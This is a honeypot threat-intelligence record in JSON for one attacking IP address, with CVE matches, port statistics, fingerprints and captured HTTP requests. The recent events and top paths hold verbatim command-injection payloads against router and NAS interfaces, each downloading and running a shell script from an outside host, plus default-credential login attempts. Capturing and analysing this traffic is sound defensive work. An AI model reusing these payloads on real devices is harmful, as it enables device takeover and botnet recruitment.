{"ip":"91.92.40.34","total_events":203,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"14 exploit-path hits","confidence":"high","network_type":null,"why":["14 request(s) matched a known exploit path.","Body-carrying methods (POST/PUT/PATCH/DELETE) seen: payload delivery, not just recon.","5+ hits raise confidence to high.","Not in any known-scanner range."]},"first_seen":"2026-06-09T19:38:33","last_seen":"2026-07-09T04:25:00","events_24h":0,"events_7d":168,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"Limburg","city":"Eygelshoven","lat":50.8897,"lon":6.0563,"asn":197170,"org":"TechTies Inc."},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2007-3010","title":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/masterCGI"},{"cve_id":"CVE-2020-9054","title":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/weblogin.cgi"},{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"},{"cve_id":"CVE-2014-2321","title":"ZTE Cable Modem Web Shell","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web_shell_cmd.gch"},{"cve_id":"CVE-2022-25226","title":"ThinVNC - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cmd"},{"cve_id":"CVE-2021-46381","title":"D-Link DAP-1620 - Local File Inclusion","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/apply.cgi"},{"cve_id":"CVE-2026-27176","title":"MajorDoMo - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/command.php"},{"cve_id":"CVE-2017-17215","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1"}],"malware":[],"top_ports":[{"port":8090,"proto":"tcp","label":"","count":132},{"port":85,"proto":"tcp","label":"","count":36},{"port":4444,"proto":"tcp","label":"","count":8},{"port":8191,"proto":"tcp","label":"","count":5},{"port":9222,"proto":"tcp","label":"","count":4},{"port":4145,"proto":"tcp","label":"","count":4},{"port":1081,"proto":"tcp","label":"","count":4},{"port":8050,"proto":"tcp","label":"","count":4},{"port":3000,"proto":"tcp","label":"Web-alt","count":3},{"port":1080,"proto":"tcp","label":"SOCKS","count":3}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn0300_86b6b04cb9cc","ge11nn0300_0db47b7d240d","ge11nn0200_3ed38b250d3d","po11nn0500_3bc7f06d1d8b"]},"fingerprint_peers":{"ge11nn0300_0db47b7d240d":4391,"po11nn0500_3bc7f06d1d8b":7,"ge11nn0200_3ed38b250d3d":2310,"ge11nn0300_86b6b04cb9cc":6942},"user_agents":["Mozilla/5.0 (X11; Linux x86_64)","asusrouter--cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s;busybox wget http://91.92.40.118/wget.sh -O .s;curl -o .s http://91.92.40.118/wget.sh;chmod 777 .s;sh .s rep.asus;rm -f .s"],"timeline":[{"date":"2026-06-09","count":4},{"date":"2026-06-10","count":4},{"date":"2026-06-11","count":8},{"date":"2026-06-12","count":8},{"date":"2026-06-15","count":7},{"date":"2026-06-22","count":2},{"date":"2026-06-23","count":2},{"date":"2026-07-08","count":144},{"date":"2026-07-09","count":24}],"recent_events":[{"timestamp":"2026-07-09T04:25:00","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"GET /getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s;busybox wget http://91.92.40.118/wget.sh -O .s;curl -o .s http://91.92.40.118/wget.sh;chmod 777 .s;sh .s rep.zteback;rm -f .s&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit HTTP/1.1\r\nHost: <HONEYPOT>:85\r\nConnection: close\r\n\r\n","payload_hex":"474554202f676574706167652e6763683f7069643d31303032266e657874706167653d6d616e616765725f6465765f70696e675f742e67636826486f73743d3b6364202f746d703b726d202d66202e733b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b6375726c202d6f202e7320687474703a2f2f39312e39322e34302e3131382f776765742e73683b63686d6f6420373737202e733b7368202e73207265702e7a74656261636b3b726d202d66202e73264e756d6f665265706561743d312644617461426c6f636b53697a653d363426446961676e6f737469637353746174653d5265717565737465642649465f414354494f4e3d6e65772649465f49444c453d7375626d697420485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"","user_agent":"","community_id":"1:Cy/GIKCWqSwDgv8V1jX/mQdeUCc=","ja3":"","session":"b58271fc-22b9-420c-a12a-61eaa879371d","seq":1,"duration_ms":100,"bytes_in":389,"bytes_out":76,"enriched":{"digest":"24a2b81e1397b570","label":"HTTP","strings":["GET /getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;cd /tmp;rm -f .s…","Host: <HONEYPOT>:85","Connection: close"],"iocs":{"domains":["getpage.gch"]}}},{"timestamp":"2026-07-09T04:24:53","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"269\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:85\"}","body":"pingAddr=127.0.0.1%3Bcd%20/tmp%3Brm%20-f%20.s%3Bwget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bcurl%20-o%20.s%20http://91.92.40.118/wget.sh%3Bchmod%20777%20.s%3Bsh%20.s%20rep.zyxel%3Brm%20-f%20.s%3B&noCacheIE=0.0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/ping.cgi","summary":"","payload_hex":"504f5354202f6367692d62696e2f70696e672e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203236390d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a70696e67416464723d3132372e302e302e3125334263642532302f746d70253342726d2532302d662532302e7325334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2532302e7325334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2532302e732533426375726c2532302d6f2532302e73253230687474703a2f2f39312e39322e34302e3131382f776765742e736825334263686d6f642532303737372532302e7325334273682532302e732532307265702e7a7978656c253342726d2532302d662532302e73253342266e6f436163686549453d302e30","method":"POST","user_agent":"","community_id":"1:qnPL+Ui8w2bWdWzTMTYWBKfhzsg=","ja3":"","session":"0e0a1ad6-f136-4e9c-bade-6636eb89c043","seq":1,"duration_ms":100,"bytes_in":418,"bytes_out":76},{"timestamp":"2026-07-09T04:24:38","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"GET /currentsetting.htm?;cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s;busybox wget http://91.92.40.118/wget.sh -O .s;curl -o .s http://91.92.40.118/wget.sh;chmod 777 .s;sh .s rep.ngcur;rm -f .s HTTP/1.1\r\nHost: <HONEYPOT>:85\r\nConnection: close\r\n\r\n","payload_hex":"474554202f63757272656e7473657474696e672e68746d3f3b6364202f746d703b726d202d66202e733b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b6375726c202d6f202e7320687474703a2f2f39312e39322e34302e3131382f776765742e73683b63686d6f6420373737202e733b7368202e73207265702e6e676375723b726d202d66202e7320485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"","user_agent":"","community_id":"1:1qmpWOpFgG20E8aAti7KgkVsUr0=","ja3":"","session":"6b85bdec-aec7-440c-9f26-ffae740a904d","seq":1,"duration_ms":100,"bytes_in":261,"bytes_out":76,"enriched":{"digest":"c1c347b8efa6e749","label":"HTTP","strings":["GET /currentsetting.htm?;cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s…","Host: <HONEYPOT>:85","Connection: close"],"iocs":{"urls":["http://91.92.40.118/wget.sh"],"ips":["91.92.40.118"],"domains":["wget.sh"],"paths":["/91.92.40.118/wget.sh"]}}},{"timestamp":"2026-07-09T04:24:23","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"344\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:85\"}","body":"todo=connect&this_file=diag_ping.htm&next_file=diag_ping.htm&IPAddr1=127.0.0.1&ping_opt=3&TZ=&c4_IPAddr1=%3Bcd%20/tmp%3Brm%20-f%20.s%3Bwget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bcurl%20-o%20.s%20http://91.92.40.118/wget.sh%3Bchmod%20777%20.s%3Bsh%20.s%20rep.ngsetup%3Brm%20-f%20.s%3B","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/setup.cgi","summary":"","payload_hex":"504f5354202f73657475702e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203334340d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a746f646f3d636f6e6e65637426746869735f66696c653d646961675f70696e672e68746d266e6578745f66696c653d646961675f70696e672e68746d26495041646472313d3132372e302e302e312670696e675f6f70743d3326545a3d2663345f495041646472313d25334263642532302f746d70253342726d2532302d662532302e7325334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2532302e7325334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2532302e732533426375726c2532302d6f2532302e73253230687474703a2f2f39312e39322e34302e3131382f776765742e736825334263686d6f642532303737372532302e7325334273682532302e732532307265702e6e677365747570253342726d2532302d662532302e73253342","method":"POST","user_agent":"","community_id":"1:/YB096r2qsIaVDPIT+PqiNxaCqg=","ja3":"","session":"9912139c-4234-45e6-8a2b-ed5d1c45ccb9","seq":1,"duration_ms":100,"bytes_in":486,"bytes_out":76},{"timestamp":"2026-07-09T04:22:58","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Basic YWRtaW46ZGVmYXVsdA==\",\"connection\":\"close\",\"host\":\"<HONEYPOT>:85\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/","summary":"","payload_hex":"474554202f20485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a417574686f72697a6174696f6e3a2042617369632059575274615734365a47566d5958567364413d3d0d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:fkFBc/tIgUxxyFluFZyxVizP3Kw=","ja3":"","session":"cbdb21de-edbe-4c53-a3b4-c32e7694b65e","seq":1,"duration_ms":100,"bytes_in":105,"bytes_out":76},{"timestamp":"2026-07-09T04:22:18","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Basic YWRtaW46cm9vdA==\",\"connection\":\"close\",\"host\":\"<HONEYPOT>:85\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/","summary":"","payload_hex":"474554202f20485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a417574686f72697a6174696f6e3a204261736963205957527461573436636d397664413d3d0d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:v82cGGcVYo94SsbMh3g3NZdXrTM=","ja3":"","session":"9ee54a62-bbb6-4313-82e2-876750ba2eae","seq":1,"duration_ms":100,"bytes_in":101,"bytes_out":76},{"timestamp":"2026-07-09T04:20:48","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Basic YWRtaW46MTIzNDU2\",\"connection\":\"close\",\"content-length\":\"365\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:85\"}","body":"change_action=&submit_button=Basic&action=&commit=0&wan_ip=10.0.0.1&wan_mask=255.255.255.0&wan_gateway=10.0.0.2;cd%20/tmp%3Brm%20-f%20.s%3Bwget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bcurl%20-o%20.s%20http://91.92.40.118/wget.sh%3Bchmod%20777%20.s%3Bsh%20.s%20rep.lynkwan%3Brm%20-f%20.s&wan_dns1=&wan_dns2=","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/apply.cgi","summary":"","payload_hex":"504f5354202f6170706c792e63676920485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a417574686f72697a6174696f6e3a2042617369632059575274615734364d54497a4e4455320d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203336350d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a6368616e67655f616374696f6e3d267375626d69745f627574746f6e3d426173696326616374696f6e3d26636f6d6d69743d302677616e5f69703d31302e302e302e312677616e5f6d61736b3d3235352e3235352e3235352e302677616e5f676174657761793d31302e302e302e323b63642532302f746d70253342726d2532302d662532302e7325334277676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2532302e7325334262757379626f7825323077676574253230687474703a2f2f39312e39322e34302e3131382f776765742e73682532302d4f2532302e732533426375726c2532302d6f2532302e73253230687474703a2f2f39312e39322e34302e3131382f776765742e736825334263686d6f642532303737372532302e7325334273682532302e732532307265702e6c796e6b77616e253342726d2532302d662532302e732677616e5f646e73313d2677616e5f646e73323d","method":"POST","user_agent":"","community_id":"1:s8zuJOaCIeG/i4GiaurttHxtibM=","ja3":"","session":"e3733484-f4d2-4e6c-8c20-b00ecf204cc8","seq":1,"duration_ms":100,"bytes_in":546,"bytes_out":76},{"timestamp":"2026-07-09T04:20:48","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Basic YWRtaW46MTIzNDU2\",\"connection\":\"close\",\"host\":\"<HONEYPOT>:85\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/","summary":"","payload_hex":"474554202f20485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a417574686f72697a6174696f6e3a2042617369632059575274615734364d54497a4e4455320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:7Tsi88egNo0K/Q5iaFa8zQDO7D0=","ja3":"","session":"4fe65ba8-f614-4132-93b4-4bfcb093284f","seq":1,"duration_ms":100,"bytes_in":101,"bytes_out":76},{"timestamp":"2026-07-09T04:20:22","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Basic YWRtaW46MTIzNDU=\",\"connection\":\"close\",\"host\":\"<HONEYPOT>:85\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/","summary":"","payload_hex":"474554202f20485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a417574686f72697a6174696f6e3a2042617369632059575274615734364d54497a4e44553d0d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a","method":"GET","user_agent":"","community_id":"1:sVJ6AmOdCGNyV2KXczo/8ekyA9o=","ja3":"","session":"e9d3d4c6-a3da-4385-a314-8e4511fe78bb","seq":1,"duration_ms":100,"bytes_in":101,"bytes_out":76},{"timestamp":"2026-07-09T01:51:36","port":85,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"connection\":\"close\",\"content-length\":\"182\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:85\",\"user-agent\":\"asusrouter--cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s;busybox wget http://91.92.40.118/wget.sh -O .s;curl -o .s http://91.92.40.118/wget.sh;chmod 777 .s;sh .s rep.asus;rm -f .s\"}","body":"id;cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s;busybox wget http://91.92.40.118/wget.sh -O .s;curl -o .s http://91.92.40.118/wget.sh;chmod 777 .s;sh .s rep.asus;rm -f .s\u0000","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/appGet.cgi?hook=get_cfg_clientlist()","summary":"","payload_hex":"504f5354202f6170704765742e6367693f686f6f6b3d6765745f6366675f636c69656e746c697374282920485454502f312e310d0a486f73743a20<HONEYPOT>3a38350d0a557365722d4167656e743a2061737573726f757465722d2d6364202f746d703b726d202d66202e733b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b6375726c202d6f202e7320687474703a2f2f39312e39322e34302e3131382f776765742e73683b63686d6f6420373737202e733b7368202e73207265702e617375733b726d202d66202e730d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203138320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a69643b6364202f746d703b726d202d66202e733b7767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b62757379626f78207767657420687474703a2f2f39312e39322e34302e3131382f776765742e7368202d4f202e733b6375726c202d6f202e7320687474703a2f2f39312e39322e34302e3131382f776765742e73683b63686d6f6420373737202e733b7368202e73207265702e617375733b726d202d66202e7300","method":"POST","user_agent":"asusrouter--cd /tmp;rm -f .s;wget http://91.92.40.118/wget.sh -O .s;busybox wget http://91.92.40.118/wget.sh -O .s;curl -o .s http://91.92.40.118/wget.sh;chmod 777 .s;sh .s rep.asus;rm -f .s","community_id":"1:pfi7tIASz1/YSXOaoX2XJcxlr/k=","ja3":"","session":"e5ecbc25-078b-4be4-9a0e-c68cfd827414","seq":1,"duration_ms":100,"bytes_in":553,"bytes_out":76}],"http_methods":[{"method":"GET","count":93},{"method":"POST","count":76}],"distinct_ports_total":10,"top_paths":[{"path":"/","count":33,"ports":5},{"path":"/boafrm/formSysCmd","count":6,"ports":1},{"path":"/GponForm/diag_Form?images/","count":5,"ports":1},{"path":"/cgi-bin/cstecgi.cgi","count":5,"ports":1},{"path":"/apply.cgi","count":5,"ports":2},{"path":"/setup.cgi","count":5,"ports":2},{"path":"/json/version","count":4,"ports":1},{"path":"/HNAP1/","count":4,"ports":2},{"path":"/config/?cmd=cd%20/tmp%3Brm%20-f%20.s%3Bwget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bcurl%20-o%20.s%20http://91.92.40.118/wget.sh%3Bchmod%20777%20.s%3Bsh%20.s%20rep.dcs%3Brm%20-f%20.s","count":4,"ports":2},{"path":"/wd/hub/status","count":4,"ports":1},{"path":"/tmUnblock.cgi","count":4,"ports":2},{"path":"/editBlackAndWhiteList","count":3,"ports":1},{"path":"/appGet.cgi?hook=cd%20/tmp%3Brm%20-f%20.s%3Bwget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bcurl%20-o%20.s%20http://91.92.40.118/wget.sh%3Bchmod%20777%20.s%3Bsh%20.s%20rep.asus%3Brm%20-f%20.s","count":3,"ports":1},{"path":"/command.php","count":3,"ports":1},{"path":"/cgi-bin/system_command?command=;cd%20/tmp%3Brm%20-f%20.s%3Bwget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O%20.s%3Bcurl%20-o%20.s%20http://91.92.40.118/wget.sh%3Bchmod%20777%20.s%3Bsh%20.s%20rep.seowon%3Brm%20-f%20.s","count":3,"ports":1}],"distinct_paths_total":43,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Authorization","Connection","Content-Length","Content-Type","Host"],"representative":[{"name":"Authorization","value":"Basic YWRtaW46MTIzNDU2","notable":true},{"name":"Connection","value":"close","notable":false},{"name":"Content-Length","value":"365","notable":false},{"name":"Content-Type","value":"application/x-www-form-urlencoded","notable":true},{"name":"Host","value":"<HONEYPOT>:85","notable":false}],"distinct_sets":4,"events_with_headers":8},"tags":[{"tag_id":"CVE-2007-3010","tag_type":"cve","title":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/masterCGI","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2007-3010","https://marc.info/?l=full-disclosure&m=119002152126755&w=2","http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php","http://www.vupen.com/english/advisories/2007/3185","http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm"]},{"tag_id":"CVE-2020-9054","tag_type":"cve","title":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/weblogin.cgi","reference_urls":["https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/","https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml","https://nvd.nist.gov/vuln/detail/CVE-2020-9054","https://kb.cert.org/vuls/id/498544/","https://cwe.mitre.org/data/definitions/78.html"]},{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]},{"tag_id":"CVE-2014-2321","tag_type":"cve","title":"ZTE Cable Modem Web Shell","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/web_shell_cmd.gch","reference_urls":["https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/","https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/","https://nvd.nist.gov/vuln/detail/CVE-2014-2321","http://www.kb.cert.org/vuls/id/600724","http://www.myxzy.com/post-411.html"]},{"tag_id":"CVE-2022-25226","tag_type":"cve","title":"ThinVNC - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cmd","reference_urls":[]},{"tag_id":"CVE-2021-46381","tag_type":"cve","title":"D-Link DAP-1620 - Local File Inclusion","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/apply.cgi","reference_urls":["https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing","https://www.dlink.com/en/security-bulletin/","https://nvd.nist.gov/vuln/detail/CVE-2021-46381","http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html","https://github.com/SYRTI/POC_to_review"]},{"tag_id":"CVE-2026-27176","tag_type":"cve","title":"MajorDoMo - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/command.php","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2026-27176"]},{"tag_id":"CVE-2017-17215","tag_type":"cve","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1","reference_urls":[]}],"data_as_of":"2026-07-11T23:11:30.035809+00:00"}